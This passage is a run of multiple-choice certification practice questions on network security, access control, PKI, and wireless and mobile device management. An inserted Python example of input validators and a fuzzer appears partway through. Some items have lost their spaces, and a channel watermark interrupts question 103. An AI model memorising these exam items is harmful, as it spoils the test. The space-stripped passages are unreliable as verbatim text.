99. Emily manages the IDS/IPS for her network. She has a network-based intrusion prevention system (NIPS) installed and properly configured. It is not detecting obvious attacks on one specific network segment. She has verified that the NIPS is properly configured and working properly. What would be the most efficient way for her to address this?
A. Implement port mirroring for that segment.
B. Install a NIPS on that segment.
C. Upgrade to a more effective NIPS.
D. Isolate that segment on its own VLAN.
100. Dana wants to protect data in a database without changing characteristics like the data length and type. What technique can she use to do this most effectively?
A. Hashing
B. Tokenization
C. Encryption
D. Rotation
101. Elenora is responsible for log collection and analysis for a company with locations around the country. She has discovered that remote sites generate high volumes of log data, which can cause bandwidth consumption issues for those sites. What type of technology could she deploy to each site to help with this?
A. Deploy a log aggregator.
B. Deploy a honeypot.
C. Deploy a bastion host.
D. None of the above
102. Dani is performing a dynamic code analysis technique that sends a broad range of data as inputs to the application she is testing. The inputs include data that is both within the expected ranges and types for the program and data that is different and, thus, unexpected by the program. What code testing technique is Dani using?
A. Timeboxing
B. Buffer overflow
C. Input validation
D. Fuzzing
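Questions 52, 58, 67, 69 and 102 describe the two halves of one practice: server-side input validation (typed conversion with strict exception handling, length bounds, allow-lists of permitted values) and fuzzing that validator with in-range, boundary and unexpected input to show that it fails closed. The Python below is an added example, not the book's code: two validators in the style question 52 describes, a `rejects` helper, and a small deterministic fuzzer whose only acceptable outcomes are a typed value or a ValidationError; any other exception is counted as a crash. One detail it guards against that is easy to miss: Python's int() accepts ' 12', '+5', '1_0' and non-ASCII digits, so the quantity validator restricts the raw string to ASCII digits before converting. All inputs are constructed.

```python
"""Added example: server-side input validation and a fuzzer for it.

Covers the practice described in questions 52, 58, 67, 69 and 102: typed
conversion with strict exception handling, length bounds, allow-lists, and a
dynamic test that throws expected and unexpected input at the validators.
The only acceptable outcomes are a typed value or ValidationError.
"""
import random
import string
from typing import Callable, Dict

MONTHS = ("jan", "feb", "mar", "apr", "may", "jun",
          "jul", "aug", "sep", "oct", "nov", "dec")  # allow-list of values


class ValidationError(ValueError):
    """Raised for every rejected input, so callers handle exactly one type."""


def validate_quantity(raw: object) -> int:
    """Quantity field: 1-4 ASCII digits, converted to int, range 1..999.

    int() alone is too lenient: it accepts ' 12', '+5', '1_0' and Unicode
    digits such as '١٢', so the raw string is restricted first.
    """
    if not isinstance(raw, str) or not 1 <= len(raw) <= 4:
        raise ValidationError("quantity: wrong type or length")
    if not (raw.isascii() and raw.isdigit()):
        raise ValidationError("quantity: not ASCII digits")
    try:
        value = int(raw, 10)  # typed conversion
    except ValueError as exc:  # strict exception handling
        raise ValidationError("quantity: not an integer") from exc
    if not 1 <= value <= 999:
        raise ValidationError("quantity: out of range")
    return value


def validate_month(raw: object) -> str:
    """Month field: bounded length, then an allow-list lookup."""
    if not isinstance(raw, str) or len(raw) > 12:
        raise ValidationError("month: wrong type or length")
    key = raw.strip().lower()
    if key not in MONTHS:
        raise ValidationError("month: not in allow-list")
    return key


def rejects(validator: Callable[[object], object], raw: object) -> bool:
    """True if the validator refuses `raw` with ValidationError (and nothing else)."""
    try:
        validator(raw)
    except ValidationError:
        return True
    return False


def fuzz(validator: Callable[[object], object], trials: int = 2000,
         seed: int = 1) -> Dict[str, int]:
    """Deterministic fuzzer mixing in-range numbers, boundary cases and garbage.

    'crashed' counts any exception other than ValidationError; a hardened
    validator must report zero.
    """
    rng = random.Random(seed)
    alphabet = string.printable + "éü\x00١٢"
    boundary = ["", " ", "0", "1", "999", "1000", "-1", "+5", "1_0", "1e3",
                "0x10", "١٢", "12\n", " 12", "Mar", "MAR ", "march", None, 12]
    outcome = {"accepted": 0, "rejected": 0, "crashed": 0}
    for _ in range(trials):
        kind = rng.randrange(3)
        if kind == 0:
            sample = str(rng.randint(-50, 1100))
        elif kind == 1:
            sample = rng.choice(boundary)
        else:
            sample = "".join(rng.choice(alphabet) for _ in range(rng.randint(0, 12)))
        try:
            validator(sample)
            outcome["accepted"] += 1
        except ValidationError:
            outcome["rejected"] += 1
        except Exception:  # the fuzzer must record every other exception as a crash
            outcome["crashed"] += 1
    return outcome


if __name__ == "__main__":
    print("quantity:", fuzz(validate_quantity))
    print("month:", fuzz(validate_month))
```

Both validators belong on the server (question 58): anything done in the browser is advisory, since an attacker submits requests directly. The fuzzer is the dynamic check from questions 69 and 102; a crash count above zero means some input reached code that was never written to handle it.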
103. TinawantstoensurethatrogueDHCPserversarenotpermittedonthenetworkshemaintains.Whatcanshedotoprotectagainstthis?
A. DeployanIDStostoprogueDHCPpackets.
B. EnableDHCPsnooping.
C. DisableDHCPsnooping.
Telegram Channel @nettrain
D. Block traffic on the DHCP ports to all systems.
104. Endpoint detection and response has three major components that make up its ability to provide visibility into endpoints. Which of the following is not one of those three parts?
A. Data search
B. Malware analysis
C. Data exploration
D. Suspicious activity detection
105. Isabelle is responsible for security at a mid-sized company. She wants to prevent users on her network from visiting job-hunting sites while at work. Which of the following would be the best device to accomplish this goal?
A. Proxy server
B. NAT
C. A packet filter firewall
D. NIPS
106. What term describes a cloud system that stores, manages, and allows auditing of API keys, passwords, and certificates?
A. A cloud PKI
B. A cloud TPM
C. A secrets manager
D. A hush service
107. Fred is building a web application that will receive information from a service provider. What open standard should he design his application to use to work with many modern third-party identity providers?
A. SAML
B. Kerberos
C. LDAP
D. NTLM
108. You are responsible for an e-commerce site. The site is hosted in a cluster. Which of the following techniques would be best in assuring availability?
A. A VPN concentrator
B. Aggregate switching
C. An SSL accelerator
D. Load balancing
109. What channels do not cause issues with channel overlap or overlap in U.S. installations of 2.4 GHz Wi-Fi networks?
A. 1, 3, 5, 7, 9, and 11
B. 2, 6, and 10
C. 1, 6, and 11
D. Wi-Fi channels do not suffer from channel overlap.
110. Ryan is concerned about the security of his company's web application. Since the application processes confidential data, he is most concerned about data exposure. Which of the following would be the most important for him to implement?
A. WAF
B. TLS
C. NIPS
D. NIDS
111. Which of the following connection methods only works via a line-of-sight connection?
A. Bluetooth
B. Infrared
C. NFC
D. Wi-Fi
112. Carole is responsible for various network protocols at her company. The Network Time Protocol has been intermittently failing. Which of the following would be most affected?
A. Kerberos
B. RADIUS
C. CHAP
D. LDAP
113. You are selecting an authentication method for your company's servers. You are looking for a method that periodically reauthenticates clients to prevent session hijacking. Which of the following would be your best choice?
A. PAP
B. SPAP
C. CHAP
D. OAuth
114. Naomi wants to deploy a firewall that will protect her endpoint systems from other systems in the same security zone of her network as part of a zero-trust design. What type of firewall is best suited to this type of deployment?
A. Hardware firewalls
B. Software firewalls
C. Virtual firewalls
D. Cloud firewalls
115. Lisa is setting up accounts for her company. She wants to set up accounts for the Oracle database server. Which of the following would be the best type of account to assign to the database service?
A. User
B. Guest
C. Admin
D. Service
116. Gary wants to implement EAP-based protocols for his wireless authentication and wants to ensure that he uses only versions that support Transport Layer Security (TLS). Which of the following EAP-based protocols does not support TLS?
A. LEAP
B. EAP-TTLS
C. PEAP
D. EAP-TLS
117. Manny wants to download apps that aren't in the iOS App Store, as well as change settings at the OS level that Apple does not normally allow to be changed. What would he need to do to his iPhone to allow this?
A. Buy an app via a third-party app store.
B. Install an app via side-loading.
C. Jailbreak the phone.
D. Install Android on the phone.
118. Many smartcards implement a wireless technology to allow them to be used without a card reader. What wireless technology is frequently used to allow the use of smartcards for entry-access readers and similar access controls?
A. Infrared
B. Wi-Fi
C. RFID
D. Bluetooth
119. Carl has been asked to set up access control for a server. The requirements state that users at a lower privilege level should not be able to see or access files or data at a higher privilege level. What access control model would best fit these requirements?
A. MAC
B. DAC
C. RBAC
D. SAML
120. Jack wants to deploy a network access control (NAC) system that will stop systems that are not fully patched from connecting to his network. If he wants to have full details of system configuration, antivirus version, and patch level, what type of NAC deployment is most likely to meet his needs?
A. Agentless, preadmission
B. Agent-based, preadmission
C. Agentless, postadmission
D. Agent-based, postadmission
121. Claire has been notified of a zero-day flaw in a web application. She has the exploit code, including a SQL injection attack that is being actively exploited. How can she quickly react to prevent this issue from impacting her environment if she needs the application to continue to function?
A. Deploy a detection rule to her IDS.
B. Manually update the application code after reverse-engineering it.
C. Deploy a fix via her WAF.
D. Install the vendor provided patch.
122. Eric wants to provide company-purchased devices, but his organization prefers to provide end users with choices among devices that can be managed and maintained centrally. What mobile device deployment model best fits this need?
A. BYOD
B. COPE
C. CYOD
D. VDI
123. Derek is in charge of his organization's certificate authorities and wants to add a new certificate authority. His organization already has three certificate authorities operating in a mesh: A, the South American CA; B, the United States CA; and C, the European Union CA. As they expand into Australia, he wants to add D, the Australian CA. Which CAs will Derek need to issue certificates to from D to ensure that systems in the Australian domain are able to access servers in A, B, and C's domains?
A. He needs all the other systems to issue D certificates so that his systems will be trusted there.
B. He needs to issue certificates from D to each of the other CAs' systems and then have the other CAs issue D a certificate.
C. He needs to provide the private key from D to each of the other CAs.
D. He needs to receive the private key from each of the other CAs and use it to sign the root certificate for D.
124. Claire is concerned about an attacker getting information regarding network devices and their configuration in her company. Which protocol should she implement that would be most helpful in mitigating this risk while providing management and reporting about network devices?
A. RADIUS
B. TLS
C. SNMPv3
D. SFTP
125. Ben is using a tool that is specifically designed to send unexpected data to a web application that he is testing. The application is running in a test environment, and configured to log events and changes. What type of tool is Ben using?
A. A SQL injection proxy
B. A static code review tool
C. A web proxy
D. A fuzzer
126. Eric is responsible for his organization's mobile device security. They use a modern mobile device management (MDM) tool to manage a BYOD mobile device environment. Eric needs to ensure that the applications and data that his organization provides to users of those mobile devices remain as secure as possible. Which of the following technologies will provide him with the best security?
A. Storage segmentation
B. Containerization
C. Full-device encryption
D. Remote wipe
127. Murali is looking for an authentication protocol for his network. He is very concerned about highly skilled attackers. As part of mitigating that concern, he wants an authentication protocol that never actually transmits a user's password, in any form. Which authentication protocol would be a good fit for Murali's needs?
A. CHAP
B. Kerberos
C. RBAC
D. Type II
128. As part of the certificate issuance process from the CA that her company works with, Marie is required to prove that she is a valid representative of her company. The CA goes through additional steps to ensure that she is who she says she is and that her company is legitimate, and not all CAs can issue this type of certificate. What type of certificate has she been issued?
A. An EV certificate
B. A domain-validated certificate
C. An organization validation certificate
D. An OCSP certificate
129. Mark wants to provide a wireless connection with the highest possible amount of bandwidth. Which of the following should he select?
A. LTE cellular
B. Bluetooth
C. NFC
D. 802.11ac Wi-Fi
130. What is the primary advantage of cloud-native security solutions when compared to third-party solutions deployed to the same cloud environment?
A. Lower cost
B. Better security
C. Tighter integration
D. All of the above
131. Ed needs to securely connect to a DMZ from an administrative network using Secure Shell (SSH). What type of system is frequently deployed to allow this to be done securely across security boundaries for network segments with different security levels?
A. An IPS
B. A NAT gateway
C. A router
D. A jump box
132. You work for a social media website. You wish to integrate your users’ accounts with other web resources. To do so, you need to allow authentication to be used across different domains, without exposing your users’ passwords to these other services. Which of the following would be most helpful in accomplishing this goal?
A. Kerberos
B. SAML
C. OAuth
D. OpenID
133. Christina wants to ensure that session persistence is maintained by her load balancer. What is she attempting to do?
A. Ensure that all of a client's requests go to the same server for the duration of a given session or transaction.
B. Assign the same internal IP address to clients whenever they connect through the load balancer.
C. Ensure that all transactions go to the current server in a round-robin during the time it is the primary server.
D. Assign the same external IP address to all servers whenever they are the primary server assigned by the load balancer.
134. Tara is concerned about staff in her organization sending email with sensitive information like customer Social Security numbers (SSNs) included in it. What type of solution can she implement to help prevent inadvertent exposures of this type of sensitive data?
A. FDE
B. DLP
C. S/MIME
D. POP3S
135. Jennifer is considering using an infrastructure as a service cloud provider to host her organization's web application, database, and web servers. Which of the following is not a reason that she would choose to deploy to a cloud service?
A. Support for high availability
B. Direct control of underlying hardware
C. Reliability of underlying storage
D. Replication to multiple geographic zones
136. This image shows an example of a type of secure management interface. What term describes using management interfaces or protected alternate means to manage devices and systems?
A. A DMZ
B. Out-of-band management
C. In-band management
D. A TLS
137. Chris has provided the BitLocker encryption keys for computers in his department to his organization's security office so that they can decrypt computers in the event of a breach or investigation. What is this concept called?
A. Key escrow
B. A BitLocker Locker
C. Key submission
D. AES jail
138. Marek has configured systems in his network to perform boot attestation. What has he configured the systems to do?
A. To run only trusted software based on previously stored hashes using a chained boot process
B. To notify a BOOTP server when the system has booted up
C. To hash the BIOS of the system to ensure that the boot process has occurred securely
D. To notify a remote system or management tool that the boot process was secure using measurements from the boot process
139. You have been asked to find an authentication service that is handled by a third party. The service should allow users to access multiple websites, as long as they support the third-party authentication service. What would be your best choice?
A. OpenID
B. Kerberos
C. NTLM
D. Shibboleth
140. Which of the following steps is a common way to harden the Windows registry?
A. Ensure the registry is fully patched.
B. Set the registry to read-only mode.
C. Disable remote registry access if not required.
D. Encrypt all user-mode registry keys.
141. Lois is designing the physical layout for her wireless access point (WAP) placement in her organization. Which of the following items is not a common concern when designing a WAP layout?
A. Determining construction material of the walls around the access points
B. Assessing power levels from other access points
C. Performing a site survey
D. Maximizing coverage overlap
142. Gabby has been laid off from the organization that she has worked at for almost a decade. Mark needs to make sure that Gabby's account is securely handled after her last day of work. What can he do to her account as an interim step to best ensure that files are still accessible and that the account could be returned to use if Gabby returns after the layoff?
A. Delete the account and re-create it when it is needed.
B. Disable the account and reenable it if it is needed.
C. Leave the account active in case Gabby returns.
D. Change the password to one Gabby does not know.
143. Mason is responsible for security at a company that has traveling salespeople. The company has been using ABAC for access control to the network. Which of the following is an issue that is specific to ABAC and might cause it to incorrectly reject logins?
A. Geographic location
B. Wrong password
C. Remote access is not allowed by ABAC.
D. Firewalls usually block ABAC.
144. Darrell is concerned that users on his network have too many passwords to remember and might write down their passwords, thus creating a significant security risk. Which of the following would be most helpful in mitigating this issue?
A. Multifactor authentication
B. SSO
C. SAML
D. LDAP
145. Frank is a security administrator for a large company. Occasionally, a user needs to access a specific resource that they don't have permission to access. Which access control methodology would be most helpful in this situation?
A. Mandatory access control (MAC)
B. Discretionary access control (DAC)
C. Role-based access control
D. Rule-based access control
146. Ed is designing the security architecture for his organization's move into an infrastructure as a service cloud environment. In his on-site datacenter, he has deployed a firewall in front of the datacenter network to protect it, and he has built rules that allow necessary services in, as well as outbound traffic for updates and similar needs. He knows that his cloud environment will be different. Which of the following is not a typical concern for cloud firewall designs?
A. Segmentation requirements for virtual private clouds (VPCs)
B. Hardware access for updates
C. The cost of operating firewall services in the cloud
D. OSI layers and visibility of traffic to cloud firewalls
147. Amelia is looking for a network authentication method that can use digital certificates and does not require end users to remember passwords. Which of the following would best fit her requirements?
A. OAuth
B. Tokens
C. OpenID
D. RBAC
148. Damian has designed and built a website that is accessible only inside of a corporate network. What term is used to describe this type of internal resource?
A. An intranet
B. An extranet
C. A DMZ
D. A TTL
149. The firewall that Walter has deployed looks at every packet sent by systems that travel through it, ensuring that each packet matches the rules that it operates and filters traffic by. What type of firewall is being described?
A. Next generation
B. Stateless
C. Application layer
D. Stateful
150. Nancy wants to protect and manage her RSA keys while using a mobile device. What type of solution could she purchase to ensure that the keys are secure so that she can perform public key authentication?
A. An application-based PKI
B. An OPAL-encrypted drive
C. A MicroSD HSM
D. An offline CA
151. Oliver needs to explain the access control scheme used by both the Windows and Linux filesystems. What access control scheme do they implement by default?
A. Role-based access control
B. Mandatory access control
C. Rule-based access control
D. Discretionary access control
152. Stefan just became the new security officer for a university. He is concerned that student workers who work late on campus could try to log in with faculty credentials. Which of the following would be most effective in preventing this?
A. Time-of-day restrictions
B. Usage auditing
C. Password length
D. Credential management
153. Next-generation firewalls include many cutting-edge features. Which of the following is not a common next-generation firewall capability?
A. Geolocation
B. IPS and/or IDS
C. Sandboxing
D. SQL injection
154. Greg knows that when a switch doesn't know where a node is, it will send out a broadcast to attempt to find it. If other switches inside its broadcast domain do not know about the node, they will also broadcast that query, and this can create a massive amount of traffic that can quickly amplify out of control. He wants to prevent this scenario without causing the network to be unable to function. What port-level security feature can he enable to prevent this?
A. Use ARP blocking.
B. Block all broadcast packets.
C. Enable storm control.
D. None of the above
155. Isaac is designing his cloud datacenter's public-facing network and wants to properly implement segmentation to protect his application servers while allowing his web servers to be accessed by customers. What design concept should he apply to implement this type of secure environment?
A. A reverse proxy server
B. A DMZ
C. A forward proxy server
D. A VPC
156. Jennifer is concerned that some people in her company have more privileges than they should. This has occurred due to people moving from one position to another and having cumulative rights that exceed the requirements of their current jobs. Which of the following would be most effective in mitigating this issue?
A. Permission auditing
B. Job rotation
C. Preventing job rotation
D. Separation of duties
157. Susan has been tasked with hardening the systems in her environment and wants to ensure that data cannot be recovered from systems if they are stolen or their disk drives are stolen and accessed. What is her best option to ensure data security in these situations?
A. Deploy folder-level encryption.
B. Deploy full-disk encryption.
C. Deploy file-level encryption.
D. Degauss all the drives.
158. Chloe has noticed that users on her company's network frequently have simple passwords made up of common words. Thus, they have weak passwords. How could Chloe best mitigate this issue?
A. Increase minimum password length.
B. Have users change passwords more frequently.
C. Require password complexity.
D. Implement Single Sign-On (SSO).
159. Which Wi-Fi protocol implements simultaneous authentication of equals (SAE) to improve on previous security models?
A. WEP
B. WPA
C. WPA2
D. WPA3
160. Megan wants to set up an account that can be issued to visitors. She configures a kiosk application that will allow users in her organization to sponsor the visitor, set the amount of time that the user will be on-site, and then allow them to log in to the account, set a password, and use Wi-Fi and other services. What type of account has Megan created?
A. A user account
B. A shared account
C. A guest account
D. A service account
161. Henry wants to deploy a web service to his cloud environment for his customers to use. He wants to be able to see what is happening and stop abuse without shutting down the service if customers cause issues. What two things should he implement to allow this?
A. An API gateway and logging
B. API keys and logging via an API gateway
C. An API-centric IPS and an API proxy
D. All of the above
162. Patrick has been asked to identify a UTM appliance for his organization. Which of the following capabilities is not a common feature for a UTM device?
A. IDS and/or IPS
B. Antivirus
C. MDM
D. DLP
163. A companywide policy is being created to define various security levels. Which of the following systems of access control would use documented security levels like Confidential or Secret for information?
A. RBAC
B. MAC
C. DAC
D. BAC
164. This image shows a type of proxy. What type of proxy is shown?
A. A forward proxy
B. A boomerang proxy
C. A next generation proxy
D. A reverse proxy
165. Gurvinder is reviewing log files for authentication events and notices that one of his users has logged in from a system at his company's home office in Chicago. Less than an hour later, the same user is recorded as logging in from an IP address that geo-IP tools say comes from Australia. What type of issue should he flag this as?
A. A misconfigured IP address
B. An impossible travel time, risky login issue
C. A geo-IP lookup issue
D. None of the above
166. Users in your network are able to assign permissions to their own shared resources. Which of the following access control models is used in your network?
A. DAC
B. RBAC
C. MAC
D. ABAC
167. Cynthia is preparing a new server for deployment and her process includes turning off unnecessary services, setting security settings to match her organization's baseline configurations, and installing patches and updates. What is this process known as?
A. OS hardening
B. Security uplift
C. Configuration management
D. Endpoint lockdown
168. John is performing a port scan of a network as part of a security audit. He notices that the domain controller is using secure LDAP. Which of the following ports would lead him to that conclusion?
A. 53
B. 389
C. 443
D. 636
169. Chris wants to securely generate and store cryptographic keys for his organization's servers, while also providing the ability to offload TLS encryption processing. What type of solution should he recommend?
A. A GPU in cryptographic acceleration mode
B. A TPM
C. A HSM
D. A CPU in cryptographic acceleration mode
170. Tracy wants to protect desktop and laptop systems in her organization from network attacks. She wants to deploy a tool that can actively stop attacks based on signatures, heuristics, and anomalies. What type of tool should she deploy?
A. A firewall
B. Antimalware
C. HIDS
D. HIPS
171. Which of the following access control methods grants permissions based on the user's position in the organization?
A. MAC
B. RBAC
C. DAC
D. ABAC
172. What does UEFI measured boot do?
A. Records how long it takes for a system to boot up
B. Records information about each component that is loaded, stores it in the TPM, and can report it to a server
C. Compares the hash of every component that is loaded against a known hash stored in the TPM
D. Checks for updated versions of the UEFI, and compares it to the current version; if it is measured as being too far out of date, it updates the UEFI
173. Kerberos uses which of the following to issue tickets?
A. Authentication service
B. Certificate authority
C. Ticket-granting service
D. Key distribution center
174. Maria wants to ensure that her wireless controller and access points are as secure as possible from attack via her network. What control should she put in place to protect them from brute-force password attacks and similar attempts to take over her wireless network's hardware infrastructure?
A. Regularly patch the devices.
B. Disable administrative access.
C. Put the access points and controllers on a separate management VLAN.
D. All of the above
175. Marcus wants to check on the status of carrier unlocking for all mobile phones owned by and deployed by his company. What method is the most effective way to do this?
A. Contact the cellular provider.
B. Use an MDM tool.
C. Use a UEM tool.
D. None of the above; carrier unlock must be verified manually on the phone.
176. Michael wants to implement a zero-trust network. Which of the following steps is not a common step in establishing a zero trust network?
A. Simplify the network.
B. Use strong identity and access management.
C. Configure firewalls for least privilege and application awareness.
D. Log security events and analyze them.
177. Samantha is looking for an authentication method that incorporates the X.509 standard and will allow authentication to be digitally signed. Which of the following authentication methods would best meet these requirements?
A. Certificate-based authentication
B. OAuth
C. Kerberos
D. Smartcards
178. Your company relies heavily on cloud and SaaS service providers such as salesforce.com, Office 365, and Google. Which of the following would you have security concerns about?
A. LDAP
B. TACACS+
C. SAML
D. Transitive trust
179. What is the primary difference between MDM and UEM?
A. MDM does not include patch management.
B. UEM does not include support for mobile devices.
C. UEM supports a broader range of devices.
D. MDM patches domain machines, not enterprise machines.
180. Kathleen wants to implement a zero-trust network design and knows that she should segment the network. She remains worried about east/west traffic inside the network segments. What is the first security tool she should implement to ensure hosts remain secure from network threats?
A. Antivirus
B. Host-based firewalls
C. Host-based IPS
D. FDE
181. Gary is designing his cloud infrastructure and needs to provide a firewall-like capability for the virtual systems he is running. Which of the following cloud capabilities acts like a virtual firewall?
A. Security groups
B. Dynamic resource allocation
C. VPC endpoints
D. Instance awareness
182. Derek has enabled automatic updates for the Windows systems that are used in the small business he works for. What hardening process will still need to be tackled for those systems if he wants a complete patch management system?
A. Automated installation of Windows patches
B. Windows Update regression testing
C. Registry hardening
D. Third-party software and firmware patching
183. Theresa implements a network-based IDS. What can she do to traffic that passes through the IDS?
A. Review the traffic based on rules and detect and alert about unwanted or undesirable traffic.
B. Review the traffic based on rules and detect and stop traffic based on those rules.
C. Detect sensitive data being sent to the outside world and encrypt it as it passes through the IDS.
D. All of the above
184. Murali is building his organization's container security best practices document and wants to ensure that he covers the most common items for container security. Which of the following is not a specific concern for containers?
A. The security of the container host
B. Securing the management stack for the container
C. Insider threats
D. Monitoring network traffic to and from the containers for threats and attacks
185. Gary's organization uses a NAT gateway at its network edge. What security benefit does a NAT gateway provide?
A. It statefully blocks traffic based on port and protocol as a type of firewall.
B. It can detect malicious traffic and stop it from passing through.
C. It allows systems to connect to another network without being directly exposed to it.
D. It allows non-IP-based addresses to be used behind a legitimate IP address.
186. Fred sets up his authentication and authorization system to apply the following rules to authenticated users:
Users who are not logging in from inside the trusted network must use multifactor authentication.
Users whose devices have not passed a NAC check must use multifactor authentication.
Users who have logged in from geographic locations that are more than 100 miles apart within 15 minutes will be denied.
What type of access control is Fred using?
A. Geofencing
B. Time-based logins
C. Conditional access
D. Role-based access
187. Henry is an employee at Acme Company. The company requires him to change his password every three months. He has trouble remembering new passwords, so he keeps switching between just two passwords. Which policy would be most effective in preventing this?
A. Password complexity
B. Password history
C. Password length
D. Multifactor authentication
188. The following image shows a scenario where Switch X is attached to a network by an end user and advertises itself with a lower spanning tree priority than the existing switches. Which of the following settings can prevent this type of issue from occurring?
A. 802.11n
B. Port recall
C. RIP guard
D. BPDU guard
189. Tracy wants to limit when users can log in to a standalone Windows workstation. What can Tracy do to make sure that an account called “visitor” can only log in between 8 a.m. and 5 p.m. every weekday?
A. Running the command net user visitor /time:M-F,8am-5pm
B. Running the command net reg user visitor -daily-working-hours
C. Running the command login limit:daily time:8-5
D. This cannot be done from the Windows command line.
190. Sheila is concerned that some users on her network may be accessing files that they should not—specifically, files that are not required for their job tasks. Which of the following would be most effective in determining if this is happening?
A. Usage auditing and review
B. Permissions auditing and review
C. Account maintenance
D. Policy review
191. In which of the following scenarios would using a shared account pose the least security risk?
A. For a group of tech support personnel
B. For guest Wi-Fi access
C. For students logging in at a university
D. For accounts with few privileges
192. Mike's manager has asked him to verify that the certificate chain for their production website is valid. What has she asked Mike to validate?
A. That the certificate has not been revoked
B. That users who visit the website can verify that the site and the CAs in the chain are all trustworthy
C. That the encryption used to create the certificate is strong and has not been cracked
D. That the certificate was issued properly and that prior certificates issued for the same system have also been issued properly
193. Maria is responsible for security at a small company. She is concerned about unauthorized devices being connected to the network. She is looking for a device authentication process. Which of the following would be the best choice for her?
A. CHAP
B. Kerberos
C. 802.11i
D. 802.1X
194. Which wireless standard uses CCMP to provide encryption for network traffic?
A. WPA2
B. WEP
C. Infrared
D. Bluetooth
195. Charles is a CISO for an insurance company. He recently read about an attack wherein an attacker was able to enumerate all the network devices in an organization. All this was done by sending queries using a single protocol. Which protocol should Charles secure to mitigate this attack?
A. SNMP
B. POP3
C. DHCP
D. IMAP
196. Magnus is concerned about someone using a password cracker on computers in his company. He is concerned that crackers will attempt common passwords in order to log in to a system. Which of the following would be best for mitigating this threat?
A. Password age restrictions
B. Password minimum length requirements
C. Account lockout policies
D. Account usage auditing
197. Lucas is looking for an XML-based open standard for exchanging authentication information. Which of the following would best meet his needs?
A. SAML
B. OAuth
C. RADIUS
D. NTLM
198. Joshua is looking for an authentication protocol that would be effective at stopping session hijacking. Which of the following would be his best choice?
A. CHAP
B. PAP
C. TACACS+
D. RADIUS
199. Greg's company has a remote location that uses an IP-based streaming security camera system. How could Greg ensure that the remote location's networked devices can be managed as if they are local devices and that the traffic to that remote location is secure?
A. An as-needed TLS VPN
B. An always-on TLS VPN
C. An always-on IPSec VPN
D. An as-needed IPSec VPN
200. What does the OPAL standard specify?
A. Online personal access licenses
B. Self-encrypting drives
C. The origin of personal accounts and libraries
D. Drive sanitization modes for degaussers
201. What does Unified Extensible Firmware Interface (UEFI) Secure Boot do?
A. It protects against worms during the boot process.
B. It validates a signature for each binary loaded during boot.
C. It validates the system BIOS version.
D. All of the above
202. Derek is trying to select an authentication method for his company. He needs one that will work with a broad range of services like those provided by Microsoft and Google so that users can bring their own identities. Which of the following would be his best choice?
A. Shibboleth
B. RADIUS
C. OpenID Connect
D. OAuth
203. Jason is considering deploying a network intrusion prevention system (IPS) and wants to be able to detect advanced persistent threats. What type of IPS detection method is most likely to detect the behaviors of an APT after it has gathered baseline information about normal operations?
A. Signature-based IPS detections
B. Heuristic-based IPS detections
C. Malicious tool hash IPS detections
D. Anomaly-based IPS detections
204. What component is most often used as the foundation for a hardware root of trust for a modern PC?
A. The CPU
B. A TPM
C. A HSM
D. The hard drive or SSD
205. Dennis wants to deploy a firewall that can provide URL filtering. What type of firewall should he deploy?
A. A packet filter
B. A stateful packet inspection firewall
C. A next-generation firewall
D. None of the above
206. Waleed's organization uses a combination of internally developed and commercial applications that they deploy to mobile devices used by staff throughout the company. What type of tool can he use to handle a combination of bring-your-own-device phones and corporate tablets that need to have these applications loaded onto them and removed from them when their users are no longer part of the organization?
A. MOM
B. MLM
C. MIM
D. MAM
207. Charlene is preparing a report on the most common application security issues for cloud applications. Which of the following is not a major concern for cloud applications?
A. Local machine access leading to compromise
B. Misconfiguration of the application
C. Insecure APIs
D. Account compromise
208. The CA that Samantha is responsible for is kept physically isolated and is never connected to a network. When certificates are issued, they are generated then manually transferred via removable media. What type of CA is this, and why would Samantha's organization run a CA in this mode?
A. An online CA; it is faster to generate and provide certificates.
B. An offline CA; it is faster to generate and provide certificates.
C. An online CA; it prevents potential exposure of the CA's root certificate.
D. An offline CA; it prevents potential exposure of the CA's root certificate.
209. Susan has configured a virtual private network (VPN) so that traffic destined for systems on her corporate network is routed over the VPN but traffic sent to other destinations is sent out via the VPN user's local network. What is this configuration called?
A. Half-pipe
B. Full-tunnel
C. Split-tunnel
D. Split horizon
210. Adam has experienced problems with users plugging in cables between switches on his network, which results in multiple paths to the same destinations being available to systems on the network. When this occurs, the network experiences broadcast storms, causing network outages. What network configuration setting should he enable on his switches to prevent this?
A. Loop protection
B. Storm watch
C. Sticky ports
D. Port inspection
211. Charles is concerned that users of Android devices in his company are delaying OTA updates. Why would Charles be concerned about this, and what should he do about it?
A. OTA updates patch applications, and a NAC agent would report on all phones in the organization.
B. OTA updates update device encryption keys and are necessary for security, and a PKI would track encryption certificates and keys.
C. OTA updates patch firmware and update phone configurations, and an MDM tool would provide reports on firmware versions and phone settings.
D. OTA updates are sent by phones to report on online activity and tracking, and an MDM tool receives OTA updates to monitor phones.
212. Ben is preparing to implement a firewall for his network and is considering whether to implement an open source firewall or a proprietary commercial firewall. Which of the following is not an advantage of an open source firewall?
A. Lower cost
B. Community code validation
C. Maintenanceandsupport
D. Speedofacquisition
213. BarbarawantstoimplementWPA3Personal.WhichofthefollowingfeaturesisamajorsecurityimprovementinWPA3overWPA2?
A. DDoSmonitoringandprevention
B. Per-channelsecurity
C. Brute-forceattackprevention
D. Improvementsfrom64-bitto128-bitencryption
214. IsaacwantstoimplementmandatoryaccesscontrolsonanAndroid-baseddevice.Whatcanhedotoaccomplishthis?
A. RunAndroidinsingle-usermode.
B. UseSEAndroid.
C. ChangetheAndroidregistrytoMACmode.
D. InstallMACDroid.
215. Greghasimplementedasystemthatallowsuserstoaccessaccountslikeadministratorandrootwithoutknowingtheactualpasswordsfortheaccounts.Whenusersattempttouseelevatedaccounts,theirrequestiscomparedtopoliciesthatdetermineiftherequestshouldbeallowed.Thesystemgeneratesanewpasswordeachtimeatrusteduserrequestsaccess,andthenlogstheaccessrequest.WhattypeofsystemhasGregimplemented?
A. AMACsystem
B. APAMsystem
C. An FDE system
D. A TLS system
216. Alaina has issued Android tablets to staff in her production facility, but cameras are banned due to sensitive data in the building. What type of tool can she use to control camera use on all of her organization's corporate devices that she issues?
A. MDM
B. DLP
C. OPAL
D. MMC
217. Olivia wants to enforce a wide variety of settings for devices used in her organization. Which of the following methods should she select if she needs to manage hundreds of devices while setting rules for use of SMS and MMS, audio and video recording, GPS tagging, and wireless connection methods like tethering and hotspot modes?
A. Use baseline settings automatically set for every phone before it is deployed using an imaging tool.
B. Require users to configure their phones using a lockdown guide.
C. Use a UEM tool and application to manage the devices.
D. Use a CASB tool to manage the devices.
218. John wants to deploy a solution that will provide content filtering for web applications, CASB functionality, DLP, and threat protection. What type of solution can he deploy to provide these features?
A. A reverse proxy
